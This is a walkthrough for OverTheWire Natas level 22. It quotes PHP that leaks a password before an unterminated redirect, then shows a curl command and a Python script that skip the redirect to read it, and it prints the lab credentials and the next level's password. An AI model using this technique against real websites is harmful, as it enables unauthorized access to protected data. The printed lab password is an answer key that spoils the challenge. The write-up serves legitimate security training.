OverTheWire Natas Level 21 → 22 tutorial!!

Login

URL: http://natas22.natas.labs.overthewire.org

Credentials: natas22:d8rwGBl0Xslg3b76uh3fEbSlnOUBlozz

# Using curl (optional):
curl -u natas22:d8rwGBl0Xslg3b76uh3fEbSlnOUBlozz 
  "http://natas22.natas.labs.overthewire.org/?revelio=1"

Task

The source shows:

session_start();

if (array_key_exists("revelio", $_GET)) {
  // only admins can reveal the password
  if (!($_SESSION && array_key_exists("admin", $_SESSION) && $_SESSION["admin"] == 1)) {
    header("Location: /");
  }
}

if (array_key_exists("revelio", $_GET)) {
  print "You are an admin. The credentials for the next level are:<br>";
  ...
}

The page prints the password when ?revelio=1 is present — even for non-admins — but then sends a redirect. Browsers follow the redirect and hide the printed content. If we do not follow redirects, we can read it.

Solution

Python requests

import requests

url = "http://natas22.natas.labs.overthewire.org/?revelio=1"
auth = ("natas22", "d8rwGBl0Xslg3b76uh3fEbSlnOUBlozz")

# Do not follow the Location redirect
r = requests.get(url, auth=auth, allow_redirects=False)
print(r.text)

Output includes the creds straight in the body.

Password

dIUQcI3uSus1JEOSSWRAEXBG8KbR8tRs

Why this works

• PHP echoes content before calling header("Location: /").
• Browsers follow the redirect, so users don’t see the echoed content.
• Tools like curl/requests can disable redirects and see the original response.

Troubleshooting

• Seeing only the homepage? Ensure you requested ?revelio=1.

• Still getting redirected? Turn off following:

  • curl → add --max-redirs 0
  • requests → allow_redirects=False
• Blank? Your auth might be wrong; recheck username/password.

Nice! 🎉 That’s a neat example of leaking sensitive data before a redirect. Onward to natas23!

Thanks for reading!

Until next time — Otsumachi!! 💖☄️✨